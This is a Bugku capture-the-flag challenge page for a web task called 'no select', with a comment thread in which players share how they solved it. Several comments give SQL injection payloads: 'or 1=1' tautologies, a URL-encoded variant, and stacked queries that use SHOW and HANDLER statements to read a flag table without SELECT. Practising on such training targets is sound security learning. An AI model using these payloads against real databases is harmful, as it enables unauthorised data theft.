no selectWEB 未解决

分数: 35 金币: 5
题目作者: AL4N233
一  血: 羽义
一血奖励: 5金币
解  决: 2462
提  示:
描  述:
flag{}
评论
dlgz 11月前

bugku' --

回复 0

momomowang 11月前

1' or '1

回复 0

ctfer-pls 1年前

懵逼了,原本还想一步步来,没想到第三步输入1' or '1'='1试了下。。。。。

回复 0

2686213396 1年前

sqlmap发现没有数据表可以进行注入,通过手动注入,bpGET发包id=1‘ or1=1 # 响应结果 中即有flag

回复 0

iNMB 1年前

flag{*****}

回复 0

SLfanCTF 1年前

堆叠注入:?id=1';show databases;use flag;show tables;handler flag open;handler flag read first;handler flag read next;....直到读出flag

回复 1

zhuizhui 1年前

?id=1' or 1=1;#--

回复 1

llc123 1年前

直接用万能密码太没意思了,堆叠语句:?id=1';handler flag open;handler flag read next;这里继续拼接handler flag read next;handler flag close;#

回复 2

冥王 1年前

试了好多评论区下面的都不成功,只有这一个成功了?id=1%27+or+1%3D1%23

回复 0

xxsko 1年前

有哥们通过select编码绕过滤爆出来的吗?我没成功

回复 0
一个姓⎝李⎠的师傅~ 11月前

用 show 查表名,然后堆叠查表内容

回复 0

WriteUp

image
Serim

10 金币

评分(13)

解题动态

耶无忧 攻破了该题 12小时前
zrlht 攻破了该题 1天前
小韩极客 攻破了该题 1天前
sysgetshell 攻破了该题 1天前
lvzhimo 攻破了该题 1天前
socratesx 攻破了该题 1天前
lxyooom 攻破了该题 1天前
popofthedead 攻破了该题 1天前
五彩星云 攻破了该题 2天前
jtydxx 攻破了该题 2天前
abc114514 攻破了该题 2天前
majixikuwa 攻破了该题 2天前
多米今天犯错了没 攻破了该题 3天前
hh_lll 攻破了该题 3天前
bugku0521 攻破了该题 3天前
acoikonjac 攻破了该题 4天前
zarihow 攻破了该题 4天前
ly89130 攻破了该题 5天前
1781****263 攻破了该题 5天前
苦味的辣条 攻破了该题 5天前
问题反馈